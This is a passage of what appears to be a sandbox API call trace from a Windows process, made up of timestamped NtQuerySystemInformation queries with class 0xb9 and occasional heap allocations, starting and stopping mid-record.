NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.123] GetProcessHeap () returned 0x27fc8db0000 [0187.123] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x5a) returned 0x27fc98740b0 [0187.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.153] GetProcessHeap () returned 0x27fc8db0000 [0187.153] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x4e) returned 0x27fc8e53490 [0187.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.159] GetProcessHeap () returned 0x27fc8db0000 [0187.159] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x3e) returned 0x27fc8e54630 [0187.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.164] GetProcessHeap () returned 0x27fc8db0000 [0187.164] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x3e) returned 0x27fc8e53be0 [0187.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.169] GetProcessHeap () returned 0x27fc8db0000 [0187.169] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x3e) returned 0x27fc8e53c80 [0187.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.173] GetProcessHeap () returned 0x27fc8db0000 [0187.173] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x3e) returned 0x27fc8e53d20 [0187.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.177] GetProcessHeap () returned 0x27fc8db0000 [0187.177] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x5a) returned 0x27fc9874120 [0187.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.180] GetProcessHeap () returned 0x27fc8db0000 [0187.180] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x4e) returned 0x27fc8e532b0 [0187.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.181] NtQuerySystemInformation (SystemInformationClass=0xb9, 